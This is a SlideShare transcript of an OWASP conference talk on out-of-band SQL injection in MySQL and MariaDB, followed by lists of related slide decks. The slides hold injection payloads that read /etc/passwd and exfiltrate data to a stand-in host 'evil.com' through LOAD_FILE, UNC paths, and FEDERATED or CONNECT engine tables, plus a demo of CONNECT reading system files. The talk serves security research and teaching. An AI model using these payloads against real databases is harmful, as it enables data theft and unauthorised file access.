SlideShare a Scribd company logo

[Russia] MySQL OOB injections

OWASP EEE
OWASP EEE

The document discusses various techniques for exploiting out-of-band SQL injections in MySQL, including using the LOAD_FILE, LOAD_DATA, and SELECT...INTO OUTFILE functions to retrieve files from the database server or operating system. It also covers using the FEDERATED and CONNECT storage engines to execute queries against remote databases.

Internet
1 of 19
Download to read offline
MySQL OOB injections Can I surprize you? @d0znpp
BIO @d0znpp ● Researcher ● Bug hunter ● Wallarm CEO
MySQL today ● MySQL (http://www.oracle.com/us/products/mysql/overview/index.html) ○ Enterprise Edition (http://www.oracle.com/us/products/mysql/mysqlenterprise/overview/index.html) ○ Standard Edition (http://www.oracle.com/us/products/mysql/mysqlstandard/overview/index.html) ○ Classic Edition (http://www.oracle.com/us/products/mysql/mysqlclassic/overview/index.html) ○ Community Edition (http://www.oracle.com/us/products/mysql/mysqlcommunityserver/overview/index.html) ○ Cluster CGE (http://www.oracle.com/us/products/mysql/mysqlcluster/overview/index.html) ○ Embedded (OEM/ISV) (http://www.oracle.com/us/products/mysql/mysqlembedded/overview/index.html) ● MariaDB (https://mariadb.org/) ● Percona (https://www.percona.com/) *out of scope
SQL injections summary ● Classic (data from query puts into response) a.k.a. “UNION SELECT” ● Blind (no SQL queries data puts into response) Blind SQli exploitation techniques: ● Using foreign objects (id='and(1<<(id-1)&length(load_file('/etc/passwd')))--) ● Error-based (when SQL errors puts into responses) ● Boolean search (when status code or smth. else indicates query status) ● Time-based (boolean search where query execution time indicates status) ● Out-of-band (OOB load_file(concat(‘’,version(),’.evil.comoob’)))
Why OOB? ● Faster ● Only one way to exploit asynchronous services What is asynchronous? ● I want to login. This is my credentials ● Ok. Wait... ● Is it ready? ● Is it ready?
MySQL injections overview ● Cheat sheets ○ http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet ○ https://rdot.org/forum/showthread.php?t=124 ● Latest error-based tricks: ○ EXP (https://www.exploit-db.com/docs/37953.pdf) ○ Non-geometric (https://rdot.org/forum/showpost.php?p=37133&postcount=1) ○ BIGINT UNSIGNED (https://rdot.org/forum/showthread.php?t=3167) ○ JSON_* (https://twitter.com/dsrbr/status/649963694533775360)
Out-of-band for MySQL and Windows UNC filenames on Windows systems (http://arxiv.org/pdf/1303.3047.pdf by Miroslav Štampar) ● LOAD_FILE(concat(‘’,version(),’.evil.comoob’)) function ● SELECT … INTO (OUTFILE | DUMPFILE) ‘...’ And also other file access variants: ● LOAD DATA (LOCAL) INFILE ‘...’
What you must know about “... LOCAL ...” ● LOAD DATA LOCAL INFILE executes on MySQL client. Not on server ● Client could define callback function for this (http://php.net/manual/ru/mysqli. set-local-infile-handler.php) ● By default this callback implemented in MySQL client driver ● This one supports all available wrappers in your platform ● LOAD DATA LOCAL INFILE ‘(http|php|expect|...)://...’ <- YES! Why not :) ● SSRF there
FEDERATED storage engine OOB ● Different storage engines: MEMORY, CSV, ... ● FEDERATED storage engine (https://dev.mysql.com/doc/refman/5. 7/en/federated-storage-engine.html and https://mariadb. com/kb/en/mariadb/about-federatedx/) ● CREATE TABLE … ENGINE=FEDERATED CONNECTION=’mysql://…’
CONNECT storage engine OOB (MariaDB) ● Different storage engines: MEMORY, CSV, ... ● CONNECT storage engine (https://mariadb.com/kb/en/mariadb/connect-table- types-mysql-table-type-accessing-mysqlmariadb-tables/ https://mariadb. com/kb/en/mariadb/connect-security/) ● OOB through MYSQL and ODBC table_type ● CREATE TABLE t(id int) engine=CONNECT table_type=MYSQL connection='mysql://root@evil.com/database/table; The use of the CONNECT engine requires the FILE privilege for "outward" tables. This should not be an important restriction. The use of CONNECT "outward" tables on a remote server seems of limited interest without knowing the files existing on it and must be protected anyway. On the other hand, using it on the local client machine is not an issue because it is always possible to create locally a user with the FILE privilege.
MariaDB CONNECT ENGINE file access All of these table types supports file_name argument: ● DOS ● DBF ● BIN ● CSV ● FMT ● XML (no XXE there, sorry :) ● JSON ● INI
MariaDB CONNECT ENGINE file access MariaDB [test]> create table root(a varchar(1024)) engine=connect table_type=CSV file_name='/etc/passwd'; Query OK, 0 rows affected (0.00 sec) MariaDB [test]> select * from root; +-----------------------------------------------------------------------+ | a | +-----------------------------------------------------------------------+ | root:x:0:0:root:/root:/bin/bash | | bin:x:1:1:bin:/bin:/sbin/nologin | | daemon:x:2:2:daemon:/sbin:/sbin/nologin | | adm:x:3:4:adm:/var/adm:/sbin/nologin | | lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | | sync:x:5:0:sync:/sbin:/bin/sync | +-----------------------------------------------------------------------+ 7 rows in set (0.01 sec)
MariaDB CONNECT ENGINE piece of cheat https://mariadb.com/kb/en/mariadb/connect-table-types-special-virtual-tables/ … table_type=DIR file_name=’*.frm’ options=’subdir=1’ Also only for Windows: ● MAC (network adapter details) ● WMI (really)
Summary DBApp Evil host You SQL queries FEDERATED, CONNECT LOAD DATA|XML LOCAL UNC load_file, INTO OUTFILE|DUMPF ILE
Thanks! Twitter: @d0znpp

Recommended

Introduction to TLS-1.3
Introduction to TLS-1.3 Introduction to TLS-1.3
Introduction to TLS-1.3
Vedant Jain
 
TV y video multicast en redes LAN. Trucos y recomendaciones
TV y video multicast en redes LAN. Trucos y recomendacionesTV y video multicast en redes LAN. Trucos y recomendaciones
TV y video multicast en redes LAN. Trucos y recomendaciones
NETGEAR Iberia
 
MPLS on Router OS V7 - Part 2
MPLS on Router OS V7 - Part 2MPLS on Router OS V7 - Part 2
MPLS on Router OS V7 - Part 2
GLC Networks
 
VXLAN Design and Deployment.pdf
VXLAN Design and Deployment.pdfVXLAN Design and Deployment.pdf
VXLAN Design and Deployment.pdf
NelAlv1
 
EtherChannel Configuration
EtherChannel ConfigurationEtherChannel Configuration
EtherChannel Configuration
NetProtocol Xpert
 
Deploying IP/MPLS VPN - Cisco Networkers 2010
Deploying IP/MPLS VPN - Cisco Networkers 2010Deploying IP/MPLS VPN - Cisco Networkers 2010
Deploying IP/MPLS VPN - Cisco Networkers 2010
Febrian ‎
 
Mpls basic
Mpls basicMpls basic
Mpls basic
Ahmed Hussien Ali Gomaa Bebars
 
ACI MultiPod 구성
ACI MultiPod 구성ACI MultiPod 구성
ACI MultiPod 구성
Woo Hyung Choi
 

Recommended

Introduction to TLS-1.3
Introduction to TLS-1.3 Introduction to TLS-1.3
Introduction to TLS-1.3
Vedant Jain
 
TV y video multicast en redes LAN. Trucos y recomendaciones
TV y video multicast en redes LAN. Trucos y recomendacionesTV y video multicast en redes LAN. Trucos y recomendaciones
TV y video multicast en redes LAN. Trucos y recomendaciones
NETGEAR Iberia
 
MPLS on Router OS V7 - Part 2
MPLS on Router OS V7 - Part 2MPLS on Router OS V7 - Part 2
MPLS on Router OS V7 - Part 2
GLC Networks
 
VXLAN Design and Deployment.pdf
VXLAN Design and Deployment.pdfVXLAN Design and Deployment.pdf
VXLAN Design and Deployment.pdf
NelAlv1
 
EtherChannel Configuration
EtherChannel ConfigurationEtherChannel Configuration
EtherChannel Configuration
NetProtocol Xpert
 
Deploying IP/MPLS VPN - Cisco Networkers 2010
Deploying IP/MPLS VPN - Cisco Networkers 2010Deploying IP/MPLS VPN - Cisco Networkers 2010
Deploying IP/MPLS VPN - Cisco Networkers 2010
Febrian ‎
 
Mpls basic
Mpls basicMpls basic
Mpls basic
Ahmed Hussien Ali Gomaa Bebars
 
ACI MultiPod 구성
ACI MultiPod 구성ACI MultiPod 구성
ACI MultiPod 구성
Woo Hyung Choi
 
MPLS on Router OS V7 - Part 1
MPLS on Router OS V7 - Part 1MPLS on Router OS V7 - Part 1
MPLS on Router OS V7 - Part 1
GLC Networks
 
OpenDaylight Integration with OpenStack Neutron: A Tutorial
OpenDaylight Integration with OpenStack Neutron: A TutorialOpenDaylight Integration with OpenStack Neutron: A Tutorial
OpenDaylight Integration with OpenStack Neutron: A Tutorial
mestery
 
An introduction to MPLS networks and applications
An introduction to MPLS networks and applicationsAn introduction to MPLS networks and applications
An introduction to MPLS networks and applications
Shawn Zandi
 
MP BGP-EVPN 실전기술-1편(개념잡기)
MP BGP-EVPN 실전기술-1편(개념잡기)MP BGP-EVPN 실전기술-1편(개념잡기)
MP BGP-EVPN 실전기술-1편(개념잡기)
JuHwan Lee
 
Basics of HTTP - Nafis Fuad
Basics of HTTP - Nafis FuadBasics of HTTP - Nafis Fuad
Basics of HTTP - Nafis Fuad
Cefalo
 
BGP.HE.NET by Walt Wollny
BGP.HE.NET by Walt WollnyBGP.HE.NET by Walt Wollny
BGP.HE.NET by Walt Wollny
MyNOG
 
Subnetting Made Easy
Subnetting Made EasySubnetting Made Easy
Subnetting Made Easy
Vishal Pawar
 
Introduction to SSH
Introduction to SSHIntroduction to SSH
Introduction to SSH
Hemant Shah
 
LDAP
LDAPLDAP
LDAP
Khemnath Chauhan
 
3 Router Configuration - Cisco Packet Tracer
3 Router Configuration - Cisco Packet Tracer 3 Router Configuration - Cisco Packet Tracer
3 Router Configuration - Cisco Packet Tracer
Rajan Kasodariya
 
NETCONF Call Home
NETCONF Call Home NETCONF Call Home
NETCONF Call Home
ADVA
 
Spanning tree protocol
Spanning tree protocolSpanning tree protocol
Spanning tree protocol
Muhammad Arshad
 
Cisco ACL
Cisco ACLCisco ACL
Cisco ACL
faust0
 
PowerMTA Integration Experiences and Solutions
PowerMTA Integration Experiences and SolutionsPowerMTA Integration Experiences and Solutions
PowerMTA Integration Experiences and Solutions
SparkPost
 
Juniper mpls best practice part 1
Juniper mpls best practice part 1Juniper mpls best practice part 1
Juniper mpls best practice part 1
Febrian ‎
 
Segment routing tutorial
Segment routing tutorialSegment routing tutorial
Segment routing tutorial
Yi-Sung Chiu
 
IRR Tutorial and RPKI Demo
IRR Tutorial and RPKI DemoIRR Tutorial and RPKI Demo
IRR Tutorial and RPKI Demo
APNIC
 
Module 1: ConfD Technical Introduction
Module 1: ConfD Technical IntroductionModule 1: ConfD Technical Introduction
Module 1: ConfD Technical Introduction
Tail-f Systems
 
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment OverviewCISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
Ameen Wayok
 
Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016
Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016
Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016
Bruno Teixeira
 
Database honeypot by design
Database honeypot by designDatabase honeypot by design
Database honeypot by design
qqlan
 
Advanced data mining in my sql injections using subqueries and custom variables
Advanced data mining in my sql injections using subqueries and custom variablesAdvanced data mining in my sql injections using subqueries and custom variables
Advanced data mining in my sql injections using subqueries and custom variables
DefCamp
 

More Related Content

What's hot

MPLS on Router OS V7 - Part 1
MPLS on Router OS V7 - Part 1MPLS on Router OS V7 - Part 1
MPLS on Router OS V7 - Part 1
GLC Networks
 
OpenDaylight Integration with OpenStack Neutron: A Tutorial
OpenDaylight Integration with OpenStack Neutron: A TutorialOpenDaylight Integration with OpenStack Neutron: A Tutorial
OpenDaylight Integration with OpenStack Neutron: A Tutorial
mestery
 
An introduction to MPLS networks and applications
An introduction to MPLS networks and applicationsAn introduction to MPLS networks and applications
An introduction to MPLS networks and applications
Shawn Zandi
 
MP BGP-EVPN 실전기술-1편(개념잡기)
MP BGP-EVPN 실전기술-1편(개념잡기)MP BGP-EVPN 실전기술-1편(개념잡기)
MP BGP-EVPN 실전기술-1편(개념잡기)
JuHwan Lee
 
Basics of HTTP - Nafis Fuad
Basics of HTTP - Nafis FuadBasics of HTTP - Nafis Fuad
Basics of HTTP - Nafis Fuad
Cefalo
 
BGP.HE.NET by Walt Wollny
BGP.HE.NET by Walt WollnyBGP.HE.NET by Walt Wollny
BGP.HE.NET by Walt Wollny
MyNOG
 
Subnetting Made Easy
Subnetting Made EasySubnetting Made Easy
Subnetting Made Easy
Vishal Pawar
 
Introduction to SSH
Introduction to SSHIntroduction to SSH
Introduction to SSH
Hemant Shah
 
LDAP
LDAPLDAP
LDAP
Khemnath Chauhan
 
3 Router Configuration - Cisco Packet Tracer
3 Router Configuration - Cisco Packet Tracer 3 Router Configuration - Cisco Packet Tracer
3 Router Configuration - Cisco Packet Tracer
Rajan Kasodariya
 
NETCONF Call Home
NETCONF Call Home NETCONF Call Home
NETCONF Call Home
ADVA
 
Spanning tree protocol
Spanning tree protocolSpanning tree protocol
Spanning tree protocol
Muhammad Arshad
 
Cisco ACL
Cisco ACLCisco ACL
Cisco ACL
faust0
 
PowerMTA Integration Experiences and Solutions
PowerMTA Integration Experiences and SolutionsPowerMTA Integration Experiences and Solutions
PowerMTA Integration Experiences and Solutions
SparkPost
 
Juniper mpls best practice part 1
Juniper mpls best practice part 1Juniper mpls best practice part 1
Juniper mpls best practice part 1
Febrian ‎
 
Segment routing tutorial
Segment routing tutorialSegment routing tutorial
Segment routing tutorial
Yi-Sung Chiu
 
IRR Tutorial and RPKI Demo
IRR Tutorial and RPKI DemoIRR Tutorial and RPKI Demo
IRR Tutorial and RPKI Demo
APNIC
 
Module 1: ConfD Technical Introduction
Module 1: ConfD Technical IntroductionModule 1: ConfD Technical Introduction
Module 1: ConfD Technical Introduction
Tail-f Systems
 
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment OverviewCISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
Ameen Wayok
 
Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016
Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016
Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016
Bruno Teixeira
 

What's hot (20)

MPLS on Router OS V7 - Part 1
MPLS on Router OS V7 - Part 1MPLS on Router OS V7 - Part 1
MPLS on Router OS V7 - Part 1
 
OpenDaylight Integration with OpenStack Neutron: A Tutorial
OpenDaylight Integration with OpenStack Neutron: A TutorialOpenDaylight Integration with OpenStack Neutron: A Tutorial
OpenDaylight Integration with OpenStack Neutron: A Tutorial
 
An introduction to MPLS networks and applications
An introduction to MPLS networks and applicationsAn introduction to MPLS networks and applications
An introduction to MPLS networks and applications
 
MP BGP-EVPN 실전기술-1편(개념잡기)
MP BGP-EVPN 실전기술-1편(개념잡기)MP BGP-EVPN 실전기술-1편(개념잡기)
MP BGP-EVPN 실전기술-1편(개념잡기)
 
Basics of HTTP - Nafis Fuad
Basics of HTTP - Nafis FuadBasics of HTTP - Nafis Fuad
Basics of HTTP - Nafis Fuad
 
BGP.HE.NET by Walt Wollny
BGP.HE.NET by Walt WollnyBGP.HE.NET by Walt Wollny
BGP.HE.NET by Walt Wollny
 
Subnetting Made Easy
Subnetting Made EasySubnetting Made Easy
Subnetting Made Easy
 
Introduction to SSH
Introduction to SSHIntroduction to SSH
Introduction to SSH
 
LDAP
LDAPLDAP
LDAP
 
3 Router Configuration - Cisco Packet Tracer
3 Router Configuration - Cisco Packet Tracer 3 Router Configuration - Cisco Packet Tracer
3 Router Configuration - Cisco Packet Tracer
 
NETCONF Call Home
NETCONF Call Home NETCONF Call Home
NETCONF Call Home
 
Spanning tree protocol
Spanning tree protocolSpanning tree protocol
Spanning tree protocol
 
Cisco ACL
Cisco ACLCisco ACL
Cisco ACL
 
PowerMTA Integration Experiences and Solutions
PowerMTA Integration Experiences and SolutionsPowerMTA Integration Experiences and Solutions
PowerMTA Integration Experiences and Solutions
 
Juniper mpls best practice part 1
Juniper mpls best practice part 1Juniper mpls best practice part 1
Juniper mpls best practice part 1
 
Segment routing tutorial
Segment routing tutorialSegment routing tutorial
Segment routing tutorial
 
IRR Tutorial and RPKI Demo
IRR Tutorial and RPKI DemoIRR Tutorial and RPKI Demo
IRR Tutorial and RPKI Demo
 
Module 1: ConfD Technical Introduction
Module 1: ConfD Technical IntroductionModule 1: ConfD Technical Introduction
Module 1: ConfD Technical Introduction
 
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment OverviewCISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
 
Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016
Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016
Cisco Live! :: Carrier Ethernet 2.0 :: BRKSPG-2720 | Las Vegas July/2016
 

Viewers also liked

Database honeypot by design
Database honeypot by designDatabase honeypot by design
Database honeypot by design
qqlan
 
Advanced data mining in my sql injections using subqueries and custom variables
Advanced data mining in my sql injections using subqueries and custom variablesAdvanced data mining in my sql injections using subqueries and custom variables
Advanced data mining in my sql injections using subqueries and custom variables
DefCamp
 
[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)
OWASP EEE
 
RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15
Mahfuzur Rahman
 
Dia da Música
Dia da MúsicaDia da Música
Dia da Música
Paulo Antunes
 
[Austria] Security by Design
[Austria] Security by Design[Austria] Security by Design
[Austria] Security by Design
OWASP EEE
 
[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modeling[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modeling
OWASP EEE
 
[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and Vulnerabilities[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and Vulnerabilities
OWASP EEE
 
[Russia] Give me a stable input
[Russia] Give me a stable input[Russia] Give me a stable input
[Russia] Give me a stable input
OWASP EEE
 
[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise apps[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise apps
OWASP EEE
 
[Bucharest] XML Based Attacks
[Bucharest] XML Based Attacks[Bucharest] XML Based Attacks
[Bucharest] XML Based Attacks
OWASP EEE
 
[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors
OWASP EEE
 
[Lithuania] I am the cavalry
[Lithuania] I am the cavalry[Lithuania] I am the cavalry
[Lithuania] I am the cavalry
OWASP EEE
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
OWASP EEE
 
Beginning PHPUnit
Beginning PHPUnitBeginning PHPUnit
Beginning PHPUnit
Jace Ju
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
 
CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2
Zero Science Lab
 

Viewers also liked (18)

Database honeypot by design
Database honeypot by designDatabase honeypot by design
Database honeypot by design
 
Advanced data mining in my sql injections using subqueries and custom variables
Advanced data mining in my sql injections using subqueries and custom variablesAdvanced data mining in my sql injections using subqueries and custom variables
Advanced data mining in my sql injections using subqueries and custom variables
 
[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)
 
RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15
 
Dia da Música
Dia da MúsicaDia da Música
Dia da Música
 
[Austria] Security by Design
[Austria] Security by Design[Austria] Security by Design
[Austria] Security by Design
 
[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modeling[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modeling
 
[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and Vulnerabilities[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and Vulnerabilities
 
[Russia] Give me a stable input
[Russia] Give me a stable input[Russia] Give me a stable input
[Russia] Give me a stable input
 
[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise apps[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise apps
 
[Bucharest] XML Based Attacks
[Bucharest] XML Based Attacks[Bucharest] XML Based Attacks
[Bucharest] XML Based Attacks
 
[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors
 
[Lithuania] I am the cavalry
[Lithuania] I am the cavalry[Lithuania] I am the cavalry
[Lithuania] I am the cavalry
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
 
Beginning PHPUnit
Beginning PHPUnitBeginning PHPUnit
Beginning PHPUnit
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
 
CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2
 

Similar to [Russia] MySQL OOB injections

How to create a useful MySQL bug report
How to create a useful MySQL bug reportHow to create a useful MySQL bug report
How to create a useful MySQL bug report
Valerii Kravchuk
 
My sql resources_april2012_zht
My sql resources_april2012_zhtMy sql resources_april2012_zht
My sql resources_april2012_zht
Ivan Tu
 
Ukoug 2011 mysql_arch_for_orcl_dba
Ukoug 2011 mysql_arch_for_orcl_dbaUkoug 2011 mysql_arch_for_orcl_dba
Ukoug 2011 mysql_arch_for_orcl_dba
orablue11
 
FOSDEM 2015: gdb tips and tricks for MySQL DBAs
FOSDEM 2015: gdb tips and tricks for MySQL DBAsFOSDEM 2015: gdb tips and tricks for MySQL DBAs
FOSDEM 2015: gdb tips and tricks for MySQL DBAs
Valerii Kravchuk
 
MySQL HA Orchestrator Proxysql Consul.pdf
MySQL HA Orchestrator Proxysql Consul.pdfMySQL HA Orchestrator Proxysql Consul.pdf
MySQL HA Orchestrator Proxysql Consul.pdf
YunusShaikh49
 
The Full MySQL and MariaDB Parallel Replication Tutorial
The Full MySQL and MariaDB Parallel Replication TutorialThe Full MySQL and MariaDB Parallel Replication Tutorial
The Full MySQL and MariaDB Parallel Replication Tutorial
Jean-François Gagné
 
More on gdb for my sql db as (fosdem 2016)
More on gdb for my sql db as (fosdem 2016)More on gdb for my sql db as (fosdem 2016)
More on gdb for my sql db as (fosdem 2016)
Valeriy Kravchuk
 
2016-01-16 03 Денис Нелюбин. How to test a million
2016-01-16 03 Денис Нелюбин. How to test a million2016-01-16 03 Денис Нелюбин. How to test a million
2016-01-16 03 Денис Нелюбин. How to test a million
Омские ИТ-субботники
 
Doctrine Project
Doctrine ProjectDoctrine Project
Doctrine Project
Daniel Lima
 
Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)
Valeriy Kravchuk
 
Gdb basics for my sql db as (openfest 2017) final
Gdb basics for my sql db as (openfest 2017) finalGdb basics for my sql db as (openfest 2017) final
Gdb basics for my sql db as (openfest 2017) final
Valeriy Kravchuk
 
High performance and high availability proxies for MySQL
High performance and high availability proxies for MySQLHigh performance and high availability proxies for MySQL
High performance and high availability proxies for MySQL
Mydbops
 
MySQL for Oracle DBAs
MySQL for Oracle DBAsMySQL for Oracle DBAs
MySQL for Oracle DBAs
FromDual GmbH
 
Scaling up and accelerating Drupal 8 with NoSQL
Scaling up and accelerating Drupal 8 with NoSQLScaling up and accelerating Drupal 8 with NoSQL
Scaling up and accelerating Drupal 8 with NoSQL
OSInet
 
MySQL 5.6 Performance
MySQL 5.6 PerformanceMySQL 5.6 Performance
MySQL 5.6 Performance
MYXPLAIN
 
MySQL always-up with Galera Cluster
MySQL always-up with Galera ClusterMySQL always-up with Galera Cluster
MySQL always-up with Galera Cluster
FromDual GmbH
 
Autolab Workshop
Autolab WorkshopAutolab Workshop
Autolab Workshop
Mihir Pandya
 
MariaDB/MySQL pitfalls - And how to come out again...
MariaDB/MySQL pitfalls - And how to come out again...MariaDB/MySQL pitfalls - And how to come out again...
MariaDB/MySQL pitfalls - And how to come out again...
FromDual GmbH
 
MySQL Performance Tuning Variables
MySQL Performance Tuning VariablesMySQL Performance Tuning Variables
MySQL Performance Tuning Variables
FromDual GmbH
 
MariaDB Paris Workshop 2023 - Performance Optimization
MariaDB Paris Workshop 2023 - Performance OptimizationMariaDB Paris Workshop 2023 - Performance Optimization
MariaDB Paris Workshop 2023 - Performance Optimization
MariaDB plc
 

Similar to [Russia] MySQL OOB injections (20)

How to create a useful MySQL bug report
How to create a useful MySQL bug reportHow to create a useful MySQL bug report
How to create a useful MySQL bug report
 
My sql resources_april2012_zht
My sql resources_april2012_zhtMy sql resources_april2012_zht
My sql resources_april2012_zht
 
Ukoug 2011 mysql_arch_for_orcl_dba
Ukoug 2011 mysql_arch_for_orcl_dbaUkoug 2011 mysql_arch_for_orcl_dba
Ukoug 2011 mysql_arch_for_orcl_dba
 
FOSDEM 2015: gdb tips and tricks for MySQL DBAs
FOSDEM 2015: gdb tips and tricks for MySQL DBAsFOSDEM 2015: gdb tips and tricks for MySQL DBAs
FOSDEM 2015: gdb tips and tricks for MySQL DBAs
 
MySQL HA Orchestrator Proxysql Consul.pdf
MySQL HA Orchestrator Proxysql Consul.pdfMySQL HA Orchestrator Proxysql Consul.pdf
MySQL HA Orchestrator Proxysql Consul.pdf
 
The Full MySQL and MariaDB Parallel Replication Tutorial
The Full MySQL and MariaDB Parallel Replication TutorialThe Full MySQL and MariaDB Parallel Replication Tutorial
The Full MySQL and MariaDB Parallel Replication Tutorial
 
More on gdb for my sql db as (fosdem 2016)
More on gdb for my sql db as (fosdem 2016)More on gdb for my sql db as (fosdem 2016)
More on gdb for my sql db as (fosdem 2016)
 
2016-01-16 03 Денис Нелюбин. How to test a million
2016-01-16 03 Денис Нелюбин. How to test a million2016-01-16 03 Денис Нелюбин. How to test a million
2016-01-16 03 Денис Нелюбин. How to test a million
 
Doctrine Project
Doctrine ProjectDoctrine Project
Doctrine Project
 
Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)
 
Gdb basics for my sql db as (openfest 2017) final
Gdb basics for my sql db as (openfest 2017) finalGdb basics for my sql db as (openfest 2017) final
Gdb basics for my sql db as (openfest 2017) final
 
High performance and high availability proxies for MySQL
High performance and high availability proxies for MySQLHigh performance and high availability proxies for MySQL
High performance and high availability proxies for MySQL
 
MySQL for Oracle DBAs
MySQL for Oracle DBAsMySQL for Oracle DBAs
MySQL for Oracle DBAs
 
Scaling up and accelerating Drupal 8 with NoSQL
Scaling up and accelerating Drupal 8 with NoSQLScaling up and accelerating Drupal 8 with NoSQL
Scaling up and accelerating Drupal 8 with NoSQL
 
MySQL 5.6 Performance
MySQL 5.6 PerformanceMySQL 5.6 Performance
MySQL 5.6 Performance
 
MySQL always-up with Galera Cluster
MySQL always-up with Galera ClusterMySQL always-up with Galera Cluster
MySQL always-up with Galera Cluster
 
Autolab Workshop
Autolab WorkshopAutolab Workshop
Autolab Workshop
 
MariaDB/MySQL pitfalls - And how to come out again...
MariaDB/MySQL pitfalls - And how to come out again...MariaDB/MySQL pitfalls - And how to come out again...
MariaDB/MySQL pitfalls - And how to come out again...
 
MySQL Performance Tuning Variables
MySQL Performance Tuning VariablesMySQL Performance Tuning Variables
MySQL Performance Tuning Variables
 
MariaDB Paris Workshop 2023 - Performance Optimization
MariaDB Paris Workshop 2023 - Performance OptimizationMariaDB Paris Workshop 2023 - Performance Optimization
MariaDB Paris Workshop 2023 - Performance Optimization
 

More from OWASP EEE

[Austria] ZigBee exploited
[Austria] ZigBee exploited[Austria] ZigBee exploited
[Austria] ZigBee exploited
OWASP EEE
 
[Austria] How we hacked an online mobile banking Trojan
[Austria] How we hacked an online mobile banking Trojan[Austria] How we hacked an online mobile banking Trojan
[Austria] How we hacked an online mobile banking Trojan
OWASP EEE
 
[Poland] SecOps live cooking with OWASP appsec tools
[Poland] SecOps live cooking with OWASP appsec tools[Poland] SecOps live cooking with OWASP appsec tools
[Poland] SecOps live cooking with OWASP appsec tools
OWASP EEE
 
[Cluj] Turn SSL ON
[Cluj] Turn SSL ON[Cluj] Turn SSL ON
[Cluj] Turn SSL ON
OWASP EEE
 
[Cluj] Information Security Through Gamification
[Cluj] Information Security Through Gamification[Cluj] Information Security Through Gamification
[Cluj] Information Security Through Gamification
OWASP EEE
 
